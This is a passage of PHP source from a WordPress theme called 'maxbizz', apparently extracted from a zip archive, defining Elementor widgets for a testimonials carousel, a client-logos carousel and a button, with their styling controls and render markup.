				'options' => [
					'' => __( 'Default', 'maxbizz' ),
				] + $slides_show,
				'default' => ''
			]
		);
		$this->add_control(
			'loop',
			[
				'label' => __( 'Loop', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'false',
				'options' => [
					'true' => __( 'Yes', 'maxbizz' ),
					'false' => __( 'No', 'maxbizz' ),
				]
			]
		);
		$this->add_control(
			'autoplay',
			[
				'label' => __( 'Autoplay', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'true',
				'options' => [
					'true' => __( 'Yes', 'maxbizz' ),
					'false' => __( 'No', 'maxbizz' ),
				]
			]
		);
		$this->add_control(
			'timeout',
			[
				'label' => __( 'Autoplay Timeout', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min'  => 1000,
						'max'  => 20000,
						'step' => 1000,
					],
				],
				'default' => [
					'size' => 7000,
				],
				'condition' => [
					'autoplay' => 'true',
				]
			]
		);
		$this->add_control(
			'arrows',
			[
				'label' => __( 'Arrows', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'false',
				'options' => [
					'true'   => __( 'Yes', 'maxbizz' ),
					'false'  => __( 'No', 'maxbizz' ),
				],
			]
		);
		$this->add_control(
			'dots',
			[
				'label' => __( 'Dots', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'true',
				'options' => [
					'true'   => __( 'Yes', 'maxbizz' ),
					'false'  => __( 'No', 'maxbizz' ),
				],
			]
		);

		$this->end_controls_section();

		// Styling.
		$this->start_controls_section(
			'style_general',
			[
				'label' => __( 'General', 'maxbizz' ),
				'tab' => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_control(
			'is_reverse',
			[
				'label'   => esc_html__( 'Reverse content', 'maxbizz' ),
				'type'    => Controls_Manager::SWITCHER,
				'return_value' => 'yes',
				'default' => 'no',
			]
		);

		$this->add_control(
			'tcontent_bg',
			[
				'label' => __( 'Background Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-testimonials .testi-item' => 'background: {{VALUE}};',
				],
			]
		);

		$this->add_control(
			'tcontent_color',
			[
				'label' => __( 'Text Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-testimonials .ttext' => 'color: {{VALUE}};',
				],
			]
		);

		$this->add_control(
			'line_color',
			[
				'label' => __( 'Line Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-testimonials .t-head' => 'border-color: {{VALUE}};',
				],
				'condition'	=> [
					'is_reverse!' => 'yes'
				]
			]
		);

		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'content_typography',
				'selector' => '{{WRAPPER}} .ot-testimonials .ttext',
			]
		);

		$this->add_responsive_control(
			'tcontent_padding',
			[
				'label' => __( 'Padding', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .ot-testimonials .ttext, {{WRAPPER}} .ot-testimonials .t-head' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'radius_boxes',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .testi-item' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Box_Shadow::get_type(),
			[
				'name' => 'tcontent_box_shadow',
				'selector' => '{{WRAPPER}} .testi-item',
			]
		);

		$this->end_controls_section();

		$this->start_controls_section(
			'style_tinfo',
			[
				'label' => __( 'Information', 'maxbizz' ),
				'tab' => Controls_Manager::TAB_STYLE,
			]
		);

		/* image */
		$this->add_control(
			'style_timage',
			[
				'label' => __( 'Photo', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
			]
		);

		$this->add_responsive_control(
			'spacing_img',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'size_units' => [ 'px' ],
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 200,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .ot-testimonials .tphoto' => 'margin-right: {{SIZE}}{{UNIT}};',
				],
			]
		);

		$this->add_control(
			'image_border_radius',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .ot-testimonials img' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);

		$this->add_control(
			'quote_color',
			[
				'label' => __( 'Icon Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-testimonials .tphoto:after' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'quote_bg',
			[
				'label' => __( 'Icon Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-testimonials .tphoto:after' => 'background: {{VALUE}};',
				],
			]
		);

		/* name */
		$this->add_control(
			'style_tname',
			[
				'label' => __( 'Name', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_responsive_control(
			'spacing_name',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'size_units' => [ 'px' ],
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 200,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .ot-testimonials h6' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'name_color',
			[
				'label' => __( 'Text Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-testimonials h6' => 'color: {{VALUE}};',
				],
			]
		);

		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'name_typography',
				'selector' => '{{WRAPPER}} .ot-testimonials h6',
			]
		);		

		/* job */
		$this->add_control(
			'style_tjob',
			[
				'label' => __( 'Job', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);

		$this->add_control(
			'job_color',
			[
				'label' => __( 'Text Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-testimonials span' => 'color: {{VALUE}};',
				],
			]
		);

		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'job_typography',
				'selector' => '{{WRAPPER}} .ot-testimonials span',
			]
		);		

		$this->end_controls_section();

		// Dots.
		$this->start_controls_section(
			'navigation_section',
			[
				'label' => __( 'Dots', 'maxbizz' ),
				'tab' => Controls_Manager::TAB_STYLE,
				'condition' => [
					'dots' => 'true',
				],
			]
		);

		$this->add_responsive_control(
			'dots_spacing',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => -200,
						'max' => 200,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .owl-dots' => 'bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);

		$this->add_control(
            'dots_bgcolor',
            [
                'label' => __( 'Color', 'maxbizz' ),
                'type' => Controls_Manager::COLOR,
                'selectors' => [
					'{{WRAPPER}} .owl-dots button.owl-dot span' => 'background: {{VALUE}};',
				],
            ]
        );

        $this->add_control(
            'dots_active_bgcolor',
            [
                'label' => __( 'Color Active', 'maxbizz' ),
                'type' => Controls_Manager::COLOR,
                'selectors' => [
					'{{WRAPPER}} .owl-dots button.owl-dot.active span' => 'background: {{VALUE}};',
				],
            ]
        );

        $this->end_controls_section();

        // Arrows.
		$this->start_controls_section(
			'style_nav',
			[
				'label' => __( 'Arrows', 'maxbizz' ),
				'tab' => Controls_Manager::TAB_STYLE,
				'condition' => [
					'arrows' => 'true',
				],
			]
		);
		$this->add_responsive_control(
			'arrow_spacing',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => -200,
						'max' => 200,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .owl-nav .owl-prev' => 'left: {{SIZE}}{{UNIT}};',
					'{{WRAPPER}} .owl-nav .owl-next' => 'right: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_responsive_control(
			'arrow_width',
			[
				'label' => __( 'Width', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 30,
						'max' => 70,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'width: {{SIZE}}{{UNIT}}; height: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'arrow_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'color: {{VALUE}};',
				]
			]
		);
		
		$this->add_control(
			'arrow_bg_color',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'arrow_hcolor',
			[
				'label' => __( 'Color Hover', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button:hover' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'arrow_bg_hcolor',
			[
				'label' => __( 'Background Hover', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button:hover' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'radius_arrow',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);

		$this->end_controls_section();
	}

	protected function render() {
		$settings = $this->get_settings_for_display();
		?>

		<div class="ot-testimonials ot-testimonials-carousel <?php if( $settings['is_reverse'] == 'yes' ) echo 'is-reverse'; ?>" data-loop="<?php echo $settings['loop']; ?>" data-auto="<?php echo $settings['autoplay']; ?>" data-time="<?php echo $settings['timeout']['size']; ?>" data-arrows="<?php echo $settings['arrows']; ?>" data-dots="<?php echo $settings['dots']; ?>" data-show="<?php echo $settings['tshow']; ?>" data-tshow="<?php echo esc_attr( $settings['tshow_tablet'] ); ?>" data-mshow="<?php echo esc_attr( $settings['tshow_mobile'] ); ?>">
			<div class="owl-carousel owl-theme">
				<?php if ( ! empty( $settings['testi_slider'] ) ) : foreach ( $settings['testi_slider'] as $testi ) : ?>
				<div class="testi-item">
					<?php if($testi['tcontent']) { echo '<div class="ttext">' .$testi['tcontent']. '</div>'; } ?>			
					<div class="t-head flex-middle">
						<?php if($testi['timage']['url']) { ?>
							<div class="tphoto"><img src="<?php echo $testi['timage']['url']; ?>" alt="<?php echo $testi['tname']; ?>"></div>
						<?php } ?>
						<div class="tinfo">
							<?php if($testi['tname']) { echo '<h6>' .$testi['tname']. '</h6>'; } ?>
							<?php if($testi['tjob']) { echo '<span>' .$testi['tjob']. '</span>'; } ?>
						</div>
					</div>
				</div>
				<?php endforeach; endif; ?>
			</div>				
	    </div>

	    <?php
	}

	protected function _content_template() {}

	public function get_keywords() {
		return [ 'slider', 'says', 'quote' ];
	}
}
// After the Schedule class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Testimonials() );PK�8FZ�o4�2�2.inc/backend/elementor/widgets/client-logos.phpnu�[���<?php 
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Client Logos
 */
class Maxbizz_Image_Carousel extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'iclogos';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Client Logos', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-slider-push';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'Logos', 'maxbizz' ),
			]
		);

		$repeater = new Repeater();
		$repeater->add_control(
			'title',
			[
				'label' => __( 'Name', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => __( '', 'maxbizz' ),
			]
		);
		$repeater->add_control(
			'image_partner',
			[
				'label' => __( 'Image', 'maxbizz' ),
				'type' => Controls_Manager::MEDIA,
				'default' => [
					'url' => Utils::get_placeholder_image_src(),
				],
			]
		);
		$repeater->add_control(
			'image_link',
			[
				'label' => __( 'Link', 'maxbizz' ),
				'type' => Controls_Manager::URL,
				'default' => [],
			]
		);
		$this->add_control(
		    'image_carousel',
		    [
		        'label'       => '',
		        'type'        => Controls_Manager::REPEATER,
		        'show_label'  => false,
		        'default'     => [],
		        'fields'      => array_values( $repeater->get_controls() ),
		        'title_field' => '{{{title}}}',
		    ]
		);
		$this->add_group_control(
			Group_Control_Image_Size::get_type(),
			[
				'name' => 'image_partner_size', // Usage: `{name}_size` and `{name}_custom_dimension`, in this case `thumbnail_size` and `thumbnail_custom_dimension`.
				'exclude' => ['1536x1536', '2048x2048'],
				'include' => [],
				'default' => 'full',
			]
		);

		$slides_show = range( 1, 10 );
		$slides_show = array_combine( $slides_show, $slides_show );

		$this->add_responsive_control(
			'tshow',
			[
				'label' => __( 'Slides To Show', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'options' => [
					'' => __( 'Default', 'maxbizz' ),
				] + $slides_show,
				'default' => ''
			]
		);

		$this->add_control(
			'loop',
			[
				'label' => __( 'Loop', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'true',
				'options' => [
					'true' => __( 'Yes', 'maxbizz' ),
					'false' => __( 'No', 'maxbizz' ),
				]
			]
		);
		$this->add_control(
			'autoplay',
			[
				'label' => __( 'Autoplay', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'true',
				'options' => [
					'true' => __( 'Yes', 'maxbizz' ),
					'false' => __( 'No', 'maxbizz' ),
				]
			]
		);
		$this->add_control(
			'timeout',
			[
				'label' => __( 'Autoplay Timeout', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min'  => 1000,
						'max'  => 20000,
						'step' => 1000,
					],
				],
				'default' => [
					'size' => 7000,
				],
				'condition' => [
					'autoplay' => 'true',
				]
			]
		);
		$this->add_control(
			'arrows',
			[
				'label' => __( 'Arrows', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'false',
				'options' => [
					'true'   => __( 'Yes', 'maxbizz' ),
					'false'  => __( 'No', 'maxbizz' ),
				],
			]
		);
		$this->add_control(
			'dots',
			[
				'label' => __( 'Dots', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'true',
				'options' => [
					'true'   => __( 'Yes', 'maxbizz' ),
					'false'  => __( 'No', 'maxbizz' ),
				],
			]
		);

		$this->end_controls_section();

		//Style

		$this->start_controls_section(
			'image_style_section',
			[
				'label' => __( 'Style Logos', 'maxbizz' ),
				'tab' => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_responsive_control(
			'align',
			[
				'label' => __( 'Vertical Align', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'flex-start'    => [
						'title' => __( 'Top', 'maxbizz' ),
						'icon' => 'eicon-v-align-top',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-v-align-middle',
					],
					'flex-end' => [
						'title' => __( 'Bottom', 'maxbizz' ),
						'icon' => 'eicon-v-align-bottom',
					],
				],
				'selectors' => [
					'{{WRAPPER}} .logos-carousel .owl-stage' => 'align-items: {{VALUE}};',
				],
			]
		);

		$this->add_responsive_control(
			'img_height',
			[
				'label' => __( 'Height', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'default' => [
					'unit' => 'px',
					'size' => 35,
				],
				'selectors' => [
					'{{WRAPPER}} .logos-carousel .owl-item img' => 'height: {{SIZE}}{{UNIT}};',
				],
			]
		);

		$this->add_responsive_control(
			'img_spacing',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 200,
					],
				],
				'default' => [
					'unit' => 'px',
					'size' => 70,
				],
			]
		);

		$this->start_controls_tabs( 'img_effects' );

		$this->start_controls_tab( 'normal',
			[
				'label' => __( 'Normal', 'maxbizz' ),
			]
		);

		$this->add_control(
			'opacity',
			[
				'label' => __( 'Opacity', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'max' => 1,
						'min' => 0.10,
						'step' => 0.01,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .logos-carousel .owl-item img' => 'opacity: {{SIZE}};',
				],
			]
		);

		$this->add_group_control(
			Group_Control_Css_Filter::get_type(),
			[
				'name' => 'img_css_filters',
				'selector' => '{{WRAPPER}} .logos-carousel .owl-item img',
			]
		);

		$this->end_controls_tab();

		$this->start_controls_tab( 'img_hover_effects',
			[
				'label' => __( 'Hover', 'maxbizz' ),
			]
		);

		$this->add_control(
			'opacity_hover',
			[
				'label' => __( 'Opacity', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'max' => 1,
						'min' => 0.10,
						'step' => 0.01,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .logos-carousel .owl-item img:hover' => 'opacity: {{SIZE}};',
				],
			]
		);

		$this->add_group_control(
			Group_Control_Css_Filter::get_type(),
			[
				'name' => 'img_css_filters_hover',
				'selector' => '{{WRAPPER}} .logos-carousel .owl-item img:hover',
			]
		);

		$this->end_controls_tab();

		$this->end_controls_tabs();

		$this->end_controls_section();

		// Dots.
		$this->start_controls_section(
			'navigation_section',
			[
				'label' => __( 'Dots', 'maxbizz' ),
				'tab' => Controls_Manager::TAB_STYLE,
				'condition' => [
					'dots' => 'true',
				],
			]
		);

		$this->add_responsive_control(
			'dots_spacing',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => -200,
						'max' => 200,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .owl-dots' => 'bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);

		$this->add_control(
            'dots_bgcolor',
            [
                'label' => __( 'Color', 'maxbizz' ),
                'type' => Controls_Manager::COLOR,
                'selectors' => [
					'{{WRAPPER}} .owl-dots button.owl-dot span' => 'background: {{VALUE}};',
				],
            ]
        );

        $this->add_control(
            'dots_active_bgcolor',
            [
                'label' => __( 'Color Active', 'maxbizz' ),
                'type' => Controls_Manager::COLOR,
                'selectors' => [
					'{{WRAPPER}} .owl-dots button.owl-dot.active span' => 'background: {{VALUE}};',
				],
            ]
        );

        $this->end_controls_section();

        // Arrow.
		$this->start_controls_section(
			'style_nav',
			[
				'label' => __( 'Arrows', 'maxbizz' ),
				'tab' => Controls_Manager::TAB_STYLE,
				'condition' => [
					'arrows' => 'true',
				],
			]
		);
		$this->add_control(
			'arrow_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'arrow_hcolor',
			[
				'label' => __( 'Color Hover', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button:hover' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'arrow_bg_color',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'arrow_bg_hcolor',
			[
				'label' => __( 'Background Hover', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button:hover' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'radius_arrow',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'border-radius: {{SIZE}}{{UNIT}};',
				],
			]
		);

		$this->end_controls_section();

	}

	protected function render() {
		$settings = $this->get_settings_for_display();

		if ( empty( $settings['image_carousel'] ) ) {
			return;
		}

		$slides = [];

		foreach ( $settings['image_carousel'] as $key => $attachment ) {
			$title = $attachment['title'];
            $image_url = Group_Control_Image_Size::get_attachment_image_src( $attachment['image_partner']['id'], 'image_partner_size', $settings );
            $image_html = '<img src="' . esc_attr( $image_url ) . '" alt="' . esc_attr( $title ) . '">';
            $link_tag = '';
            if ( ! empty( $attachment['image_link']['url'] ) ) {
				$this->add_render_attribute( 'link' . $key, 'href', $attachment['image_link']['url'] );

				if ( $attachment['image_link']['is_external'] ) {
					$this->add_render_attribute( 'link' . $key, 'target', '_blank' );
				}

				if ( $attachment['image_link']['nofollow'] ) {
					$this->add_render_attribute( 'link' . $key, 'rel', 'nofollow' );
				}
				$link_tag = '<a '.$this->get_render_attribute_string('link' . $key).'>';
			}
            
			$slide_html = $link_tag . '<figure>' . $image_html . '</figure>';

			if( $link_tag ){
				$slide_html .= '</a>';
			}
			if( $image_url ){
				$slides[] = $slide_html;
			}
		}
		if ( empty( $slides ) ) {
			return;
		}
		?>
		
		<div class="logos-carousel" data-loop="<?php echo $settings['loop']; ?>" data-auto="<?php echo $settings['autoplay']; ?>" data-time="<?php echo $settings['timeout']['size']; ?>" data-arrows="<?php echo $settings['arrows']; ?>" data-dots="<?php echo $settings['dots']; ?>" data-show="<?php echo $settings['tshow']; ?>" data-tshow="<?php echo esc_attr( $settings['tshow_tablet'] ); ?>" data-mshow="<?php echo esc_attr( $settings['tshow_mobile'] ); ?>" data-gaps="<?php echo esc_attr( $settings['img_spacing']['size'] ); ?>" data-tgaps="<?php echo esc_attr( $settings['img_spacing_tablet']['size'] ); ?>" data-mgaps="<?php echo $settings['img_spacing_mobile']['size']; ?>">
			<div class="owl-carousel owl-theme">
		        <?php echo implode( '', $slides ); ?>
		    </div>
	    </div>
		<?php 
		
	}

	protected function _content_template() {}

	public function get_keywords() {
		return [ 'slider', 'carousel' ];
	}

}
// After the Maxbizz_Image_Carousel class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Image_Carousel() );PK�8FZ�^�-//(inc/backend/elementor/widgets/button.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Button
 */
class Maxbizz_Button extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'ibutton';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Button', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-button';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	/**
	 * Get button sizes.
	 *
	 * Retrieve an array of button sizes for the button widget.
	 *
	 * @since 1.0.0
	 * @access public
	 * @static
	 *
	 * @return array An array containing button sizes.
	 */

	public static function get_button_color() {
		return [
			'main' 	=> __( 'Main Color', 'maxbizz' ),
			'dark' 	=> __( 'Dark Color', 'maxbizz' ),
			'light' => __( 'Light Color', 'maxbizz' ),
		];
	}

	protected function _register_controls() {

		//Content Service box
		$this->start_controls_section(
			'button_section',
			[
				'label' => __( 'Button', 'maxbizz' ),
			]
        );
        
        $this->add_responsive_control(
			'align',
			[
				'label' => __( 'Alignment', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'left'    => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-text-align-left',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-text-align-center',
					],
					'right' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-text-align-right',
					],
				],
				'prefix_class' => 'elementor%s-align-',
				'default' => '',
			]
		);

		$this->add_control(
			'btn_style',
			[
				'label' => __( 'Style Color', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'main',
				'options' => self::get_button_color(),
				'style_transfer' => true,
			]
		);		

		$this->add_control(
			'text',
			[
				'label' => __( 'Label', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'default' => __( 'Click here', 'maxbizz' ),
			]
		);

		$this->add_control(
			'link',
			[
				'label' => __( 'Link', 'maxbizz' ),
				'type' => Controls_Manager::URL,
				'placeholder' => __( 'https://your-link.com', 'maxbizz' ),
				'default' => [
					'url' => '#',
				],
			]
		);

		$this->end_controls_section();

		//Style
		$this->start_controls_section(
			'style_section',
			[
				'label' => __( 'General', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

        $this->add_responsive_control(
			'btn_padding',
			[
				'label' => 'Padding',
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', 'em', '%' ],
				'selectors' => [
					'{{WRAPPER}} .octf-btn' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'button_radius',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .octf-btn' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
        );
        $this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'btn_typography',
				'selector' => '{{WRAPPER}} .octf-btn',
			]
		);
        
		//Hover
		$this->start_controls_tabs( 'tabs_button_style' );

		$this->start_controls_tab(
			'tab_button_normal',
			[
				'label' => __( 'Normal', 'maxbizz' ),
			]
		);

		$this->add_control(
			'button_text_color',
			[
				'label' => __( 'Text Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .octf-btn' => 'fill: {{VALUE}}; color: {{VALUE}};',
				],
			]
		);

		$this->add_control(
			'btn_bg',
			[
				'label' => __( 'Background Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'selectors' => [
					'{{WRAPPER}} .octf-btn' => 'background-color: {{VALUE}};',
				],
			]
		);

		$this->add_group_control(
			Group_Control_Border::get_type(),
			[
				'name' => 'button_border',
				'selector' => '{{WRAPPER}} .octf-btn',
			]
		);

		$this->end_controls_tab();

		$this->start_controls_tab(
			'tab_button_hover',
			[
				'label' => __( 'Hover', 'maxbizz' ),
			]
		);

		$this->add_control(
			'hover_color',
			[
				'label' => __( 'Text Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'selectors' => [
					'{{WRAPPER}} .octf-btn:hover, {{WRAPPER}} .octf-btn:focus' => 'color: {{VALUE}};',
				],
			]
		);

		$this->add_control(
			'button_background_hover_color',
			[
				'label' => __( 'Background Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'selectors' => [
					'{{WRAPPER}} .octf-btn:hover, {{WRAPPER}} .octf-btn:focus' => 'background-color: {{VALUE}};',
				],
			]
        );
        $this->add_control(
			'border_hover_color',
			[
				'label' => __( 'Border Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'selectors' => [
					'{{WRAPPER}} .octf-btn:hover, {{WRAPPER}} .octf-btn:focus' => 'border-color: {{VALUE}};',
				],
			]
		);

		$this->add_control(
			'hover_animation',
			[
				'label' => __( 'Hover Animation', 'maxbizz' ),
				'type' => Controls_Manager::HOVER_ANIMATION,
			]
		);

		$this->end_controls_tab();

		$this->end_controls_tabs();

		$this->end_controls_section();

	}

	protected function render() {

		$settings = $this->get_settings_for_display();

